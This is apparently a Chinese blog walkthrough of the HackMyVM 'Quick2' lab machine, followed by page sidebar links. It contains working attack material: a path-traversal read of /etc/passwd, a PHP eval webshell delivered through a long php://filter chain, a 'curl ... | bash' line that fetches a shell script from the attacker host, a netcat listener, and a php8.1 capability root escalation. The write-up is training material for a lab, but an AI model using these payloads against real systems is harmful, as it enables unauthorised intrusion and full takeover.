Quick2 - HackMyVM

最新推荐文章于 2024-11-16 10:45:37 发布
最新推荐文章于 2024-11-16 10:45:37 发布
阅读量448 收藏 9
点赞数 6
分类专栏: hackmyvm靶场合集 文章标签: 安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/136166699
版权

简介

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick2

image-20240219005030343

本地环境

虚拟机:vitual box

靶场IP(quick2):192.168.56.103

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

小靶场,用nmap简单扫一下即可:

nmap -p 1-65535 -T4 -A -v 192.168.56.103

得到两个敏感端口:22和80

image-20240219005736517

http服务

先从网页入手,多点击几个网页,可以注意到URL是通过直接传入文件名来进行访问,怀疑有文件包含漏洞

image-20240219005942354

image-20240219010235216

image-20240219010325888

文件包含漏洞

传入路径./../../../etc/passwd,成功读取到文件内容

image-20240219010705728

但实际上后续既无法使用filter也无法使用RFI,没办法用常规手段传shell。

那就继续收集信息:回到刚才泄露出来的用户目录,筛选出两个用户andrew和nick:

image-20240219014559838

先检测第一个andrew,该用户目录下无法读取文件(其实读一下.bashrc就能基本判断出来),然后检测nick,得到回显

image-20240219014800742

flag格式默认为user.txt,读取,得到第一个flag

HMV{Its-gonna-be-a-fast-ride}

image-20240219014906597

目录遍历

后来想找找有没有其他文件,就直接遍历一下目录,然后找到新的文件

image-20240219015731981

然后进入神秘领域

image-20240219015834580

虽然也是LFI,但这次的可以filter了,所以传shell很方便。

image-20240219021314606

getshell

准备传入木马。先在跳板机上做两个端口转发,一个反弹shell一个做http服务。

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=40000 connectaddress=192.168.190.30 connectport=40000
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=40001 connectaddress=192.168.190.30 connectport=40001

image-20240219010903912

准备webshell:

<?php eval($_POST["a"]);?>'

然后用php_filter_chain_generator.py生成编码的webshell:

image-20240219101842472

使用蚁剑,密码为a,访问URL:

http://192.168.56.103/file.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

成功连接:

image-20240219101912724

然后在渗透机上起一个http服务,用来传输shell:

python3 -m http.server 40000

再用python起一个监听:

rlwrap -cAr nc -lvvp 40001

image-20240219102607276

蚁剑上起一个终端,输入命令:

curl http://192.168.56.1:40000/shell.sh | bash

image-20240219102814836

得到shell,然后用python升级一下,得到完整的shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20240219102945587

提权

先把linpeas.sh放到http服务上,下载运行

image-20240219110143495

然后就能看到php8.1可以进行capabilities提权:

image-20240219111532914

直接输入如下命令即可:

php8.1 -r "posix_setuid(0); system('/bin/bash');"

image-20240219111627115

提权成功,读取/root/root.txt,得到flag:

HMV{This-was-a-Quick-AND-fast-machine}

古明地核
关注
专栏目录
QuickLook-3.7.3(windows快速预览).zip
01-10
QuickLook是一款强大的桌面快速预览工具,它能够让你在Windows系统下快速查看各种文件的内容,而无需打开相应的软件。通过QuickLook,你可以直接在文件浏览器中预览图片、压缩包、PDF、Office文档、视频等各类文件,...
Quick-Cocos2dx-社区:Cocos2d-Lua社区版
02-03
Quick-Cocos2dx-社区 Cocos2d-x Lua社区版是在Cocos2d-x的基础上,关注于Lua进行游戏开发的引擎框架变种,意在减少重复造轮,节省开发人员的时间。 官方网站 社区版千人群(1群)号:361920466 社区版2群:138934064...
quick4 - hackmyvm
tanbinn的博客
06-09 362
hackmyvmquick4靶场
Quick3 - hackmyvm
tanbinn的博客
02-20 408
难度:简单靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3。
Adria - hackmyvm
tanbinn的博客
03-03 1018
hackmyvm的adria靶场
Quick3 - hackmyvm,2024年BATJ30套大厂网络安全经典高频面试题
m0_61330806的博客
04-06 876
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3。
Quick3 - hackmyvm网络安全布局优化之include、merge、ViewStub的使用
m0_60666921的博客
04-08 657
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!点击主页右上角的"make appointment",即可进入一个登陆界面。不存在LFI,路径爆破也没有有价值的东西。,尝试sql注入无果,然后随便改个id的值就进入其他人的界面了。用这种方式可以获取所有用户的密码。点击右上角的"My Profile"进入个人页面。print (“URL地址为:”, r.url)
hackmyvmQuick2靶机
woshicainiao666的博客
04-23 614
发现文件包含漏洞(但不能访问日志文件),有用的用户名(不知道密码),返回页面,看看还有什么,没有注意到的点这里有一个联系方式,试试ssh连接,不行,然后我又使用hydra爆破了,没有成功不行,发现不了其他的漏洞,只能使用工具扫描。
[HackMyVM]Quick 2
qq_34942239的博客
03-07 472
根据昨天靶场的经验用php_filter_chain_generator.py,而且不用二次编码绕过。在capabilities里面发现/usr/bin/php8.1 cap_setuid=ep。在file.php可以本地文件包含,并且可以使用filter。但是不能有filter过滤没法用php链getshell。php8.1可以进行capabilities提权。直接拿到root权限,然后拿到flag。在nick目录下拿到user.txt。网段 进程也看了没有什么东西。开启了 22 80端口。
[HackMyVM]靶场quick5
qq_34942239的博客
03-27 716
靶机刚出来的时候自己就做到了这里就卡住了,当时想到的是那种钓鱼pdf,下载者打开就会上线那种,后来群里大佬给了思路,用msfconsole里面的openoffice模块生成一个恶意odt,当打开的时候就会执行写在里面的宏命令。怎么说,这个靶场,easy的难度,感觉不止easy。我昨天也是这样做的,但是shell没弹过来,很奇怪,我昨天也是这样做到,shell没弹过来,今天shell就弹过来了。这里好玩的是,我在一一尝试各种文件的时候,打开andrew的snap文件夹的时候发现了火狐的文件包。
[HackMyVm] Quick
qq_34942239的博客
03-12 480
测试发现123@qq.com 和123@qq.com'#结果相同,123@qq.com'报错,说明存在sql注入。根据数据库爆破出来的uploads/3_andrew.jpg猜测上传的头像位置在这。发现比前几个quick系列多出来了employee目录。字段就dump了几条没发现有用的东西,密码也登不上。但是登录界面可以用万能密码登上去。home目录下有user.txt。添加一个GIF的文件头上传成功。前面的数字试到2找到了文件位置。sqlmap跑一下请求包。上传一句话木马时候提示。在查看进程的时候发现。
Quick-Cocos2dx-Community 3.6.5 Release Note 带官方热更新等demo
04-28
Quick-Cocos2dx-Community 3.6.5版本发布说明是Cocos2d-x社区的一个重要里程碑,这个版本包含了官方支持的热更新功能以及其他一些关键的改进和演示项目。Cocos2d-x是一个广泛使用的开源游戏开发框架,它基于C++,并...
quick-cocos2d-x v3
01-23
quick-cocos2d-x v3 是在 cocos2dx 3.x 的最新版本基础之上,移植了原来 quick-cocos2d-x 的核心框架、强大的 player 、丰富的示例等,并增加更多新的功能。 GitHub: https://github.com/dualface/v3quick
electron-quick-start-master 快速入门教程
05-31
electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程...
区块链论文速读A会-SECURITY 2024 PoS区块链中紧凑高效的前向安全多重签名 附ppt
最新发布
软件工程小施同学 的专栏
11-16 449
然而,一旦签名密钥被破坏,使用一般的多重签名方案将对 PoS 区块链的安全性构成严重威胁。也就是说,在对手获得足够的签名密钥后,它可以通过分叉链并修改过去某个时间点的历史记录来破坏 PoS 区块链的不可变性。目前唯一可用的 FS-MS 构造是 Drijvers 等人的 Pixel,它建立在配对组的基础上,并且仅在时间段级别实现前向安全性。作为概念验证,我们提供了Pixel+和Pixel++的实现,并进行了几个有代表性的实验,以证明Pixel+和Pixel++具有良好的具体效率并且具有实用性。
Gartner发布安全平台创新洞察:安全平台需具备的11项常见服务
lurenjia404的博客
11-14 947
安全和风险管理领导者的任务是管理多个安全供应商和复杂的基础设施堆栈。本研究提供了有关安全平台优势和风险的见解,并提供了为组织选择合适平台的建议。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 836
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
[CKS] 执行Pod安全标准
agjllxchjy的博客
11-13 388
目前的所有题目为2024年10月后更新的最新题库,考试的k8s版本为1.31.1。
「漏洞复现」某赛通电子文档安全管理系统 HookService SQL注入漏洞复现(CVE-2024-10660)
qq_39894062的博客
11-13 651
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
quicklook-3.6.11.msi
07-15
### 回答2: quicklook-3.6.11.msi 是一款安装程序,用于安装QuickLook软件的版本号为3.6.11。QuickLook是一款在Windows系统上功能强大的预览工具,可以帮助用户快速预览各种文件,包括文本文档、图片、音频、视频等...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值